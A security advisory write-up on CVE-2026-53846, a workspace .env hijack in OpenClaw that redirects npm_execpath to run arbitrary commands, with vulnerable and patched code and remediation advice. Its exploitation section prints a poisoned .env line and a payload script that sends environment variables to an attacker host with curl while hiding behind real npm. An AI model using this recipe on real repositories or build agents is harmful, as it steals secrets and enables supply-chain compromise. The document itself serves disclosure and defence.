CVE-2026-53846
CVE-2026-53846: Arbitrary Command Execution via Workspace .env Hijacking in OpenClaw
Alon Barad
Software EngineerJun 19, 2026·6 min read·5 visits
Executive Summary (TL;DR)
OpenClaw before 2026.4.29 allows arbitrary command execution when an operator loads a workspace containing a poisoned .env file that overrides the npm_execpath variable.
OpenClaw versions prior to 2026.4.29 contain an untrusted search path vulnerability in the install helper module. By loading an untrusted workspace containing a crafted .env file, the application allows overriding critical environment variables, specifically npm_execpath, leading to arbitrary command execution in the context of the running process. This vulnerability is tracked as CVE-2026-53846 and GHSA-24vr-rprv-67rf.
Vulnerability Overview
OpenClaw contains an automated installation utility within its workspace management framework designed to facilitate runtime dependency provisioning. When a workspace is loaded, this component initializes the operational environment and installs bundled packages required for localized execution. The dependency installation mechanism relies on executing administrative packages via automated package manager binaries.
The attack surface exists within the workspace initialization phase, during which local configuration files are parsed to establish the execution environment. By default, the application reads environmental variables from local files without validating whether these values modify internal runtime settings. An attacker can exploit this behavior to inject configuration overrides, redirecting the execution flow away from system-defined utilities to localized binaries.
The weakness is classified under CWE-426 (Untrusted Search Path), representing a vulnerability where an application executes commands via paths controlled by untrusted entities. In this context, the untrusted entity is the workspace owner or any actor capable of writing configuration files to the workspace root. The resulting impact is code execution with the privileges of the local operator running the OpenClaw service.
Root Cause Analysis
The core defect lies in the implicit trust placed in the Node.js process environment during sub-process generation. The Node.js platform automatically populates the process.env.npm_execpath environment variable when starting scripts via the Node Package Manager (npm). This variable tracks the absolute path of the active CLI script to ensure that nested execution chains use the identical runtime binaries.
OpenClaw leverages this environment variable to launch sub-processes that execute dependency installations in isolated folders. This is typically implemented via the child_process.spawn or child_process.exec APIs, referencing process.env.npm_execpath directly as the target command. This design assumes that the environment variable remains protected and unmodified during runtime.
However, during workspace initialization, the application employs a configuration parser to read a .env file from the workspace root. The parsing routine directly mutates the global process.env object with any key-value pairs specified in the user-provided configuration. No sanitization mechanism or blocklist was implemented to prevent the overwrite of sensitive runtime parameters, allowing the npm_execpath variable to be redefined arbitrarily.
Code Analysis
The following code blocks illustrate the structural deficiency within the workspace parser and the subsequent corrective implementation.
// Vulnerable Workspace Loader Implementation
const dotenv = require('dotenv');
const { spawn } = require('child_process');
const path = require('path');
function initializeWorkspace(workspacePath) {
// Vulnerable: Blindly merging user .env variables into the global process environment
dotenv.config({ path: path.join(workspacePath, '.env') });
}
function runInstallation(dependencyDirectory) {
const packageManager = process.env.npm_execpath || 'npm';
// Vulnerable: Spawning a process using the tainted npm_execpath variable
const installWorker = spawn(packageManager, ['install'], {
cwd: dependencyDirectory,
shell: true
});
}The fix introduces a strict blocklist of sensitive environment variables to prevent workspace configurations from overriding internal engine settings.
// Patched Workspace Loader Implementation
const dotenv = require('dotenv');
const { spawn } = require('child_process');
const path = require('path');
const RESTRICTED_ENV_VARS = [
'npm_execpath',
'PATH',
'NODE_OPTIONS',
'PYTHONPATH',
'NODE_PATH'
];
function safeInitializeWorkspace(workspacePath) {
const configResult = dotenv.config({ path: path.join(workspacePath, '.env') });
const parsedEnv = configResult.parsed || {};
for (const [key, value] of Object.entries(parsedEnv)) {
if (RESTRICTED_ENV_VARS.includes(key)) {
// Prevent sensitive environment variable overriding
console.warn(`[Security] Blocked attempt to override restricted variable: ${key}`);
continue;
}
process.env[key] = value;
}
}Exploitation Methodology
Exploitation requires the attacker to position a malicious configuration payload inside an untrusted workspace directory. The attack scenario typically involves hosting a public repository containing the exploit files or submitting them to an existing repository via a pull request. Once a trusted developer or build agent fetches and opens the directory within OpenClaw, the execution flow is triggered automatically.
The attack vector leverages two distinct files situated in the root of the malicious workspace: a configuration file and an executable payload script. The .env file serves as the redirection mechanism, redefining the execution path of the package manager to point directly to the localized payload script.
# Poison the package manager path within the workspace environment
npm_execpath=./scripts/compile_assets.shThe localized script (compile_assets.sh) contains the secondary payload designed to execute arbitrary instructions under the privilege context of the target system.
#!/bin/bash
# Malicious script executing inside the target environment
# Exfiltrating workspace metadata to an external endpoint
curl -d "$(env)" https://attacker-controlled-server.com/log
# Fallback to execution of the legitimate package manager to avoid detection
exec /usr/bin/npm "$@"When OpenClaw processes this workspace, it executes the payload in place of the standard package manager. The process executes seamlessly, hiding the malicious execution path from the local operator unless process telemetry or system call auditing is actively configured on the host machine.
Impact Assessment
The security implications of this flaw are significant, resulting in arbitrary execution within local or continuous integration (CI) environments. An attacker who successfully compromises a workspace can execute system-level commands with the administrative privileges of the running OpenClaw instance. This access allows the attacker to read, modify, or delete localized files and runtime configurations.
In typical continuous integration pipelines, this execution model is a critical bottleneck step. Compromising the build agent provides access to secrets, deployment keys, and cloud environment credentials stored in memory or local files. This can facilitate lateral movement within enterprise clouds and code repositories, allowing for downstream supply chain attacks.
The vulnerability is assessed with a CVSS v3.1 score of 7.1 (High) and a CVSS v4.0 score of 7.0 (High). The primary limiting factor is the requirement for local user interaction, as a trusted operator must actively load or process the compromised workspace directory. However, the exploit complexity is exceptionally low, and no administrative privileges are required to compile the malicious workspace files.
Remediation & Hardening
The primary remediation path requires upgrading the OpenClaw installation to version 2026.4.29 or later. This release enforces validation rules on workspace environment variables, neutralizing the path hijacking vectors completely. Ensure that any secondary staging environments or build nodes are updated simultaneously to prevent exposure of peripheral runners.
Where an immediate upgrade is unfeasible, administrators should implement manual defensive controls within the runtime configuration. Disable the automatic installation of bundled dependencies within the global application settings. If dependency installation is mandatory, restrict the service's operating permissions by isolating it inside a minimal container with limited outbound networking and restricted file system write access.
Defenders should configure host intrusion detection systems (HIDS) to monitor execution events generated by OpenClaw. Generate alerts when the OpenClaw binary spawns atypical shells or scripts instead of standard node execution modules. Regularly scan workspaces for the presence of the npm_execpath directive inside .env configuration files to identify potential malicious indicators before initialization.
Technical Appendix
CVSS Score
7.1/ 10
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:NEPSS Probability
0.11%
Top 98% most exploited
Affected Systems
OpenClaw workspace initialization modulesOpenClaw runtime installer engine
Affected Versions Detail
| Product | Affected Versions | Fixed Version |
|---|---|---|
openclaw OpenClaw | < 2026.4.29 | 2026.4.29 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-426 (Untrusted Search Path) |
| Attack Vector | Local (AV:L) |
| CVSS Score | 7.1 (CVSS:3.1) |
| Exploit Status | Proof-of-Concept (PoC) |
| KEV Status | Not Listed |
| Impact | Arbitrary Code Execution (RCE) |
MITRE ATT&CK Mapping
CWE-426
Untrusted Search Path
The product uses an untrusted search path that contains namespaces, directories, or environment variables controlled by an external/untrusted entity, allowing execution of unintended code.
Vulnerability Timeline
CVE Published
2026-06-16
GHSA Advisory Released
2026-06-18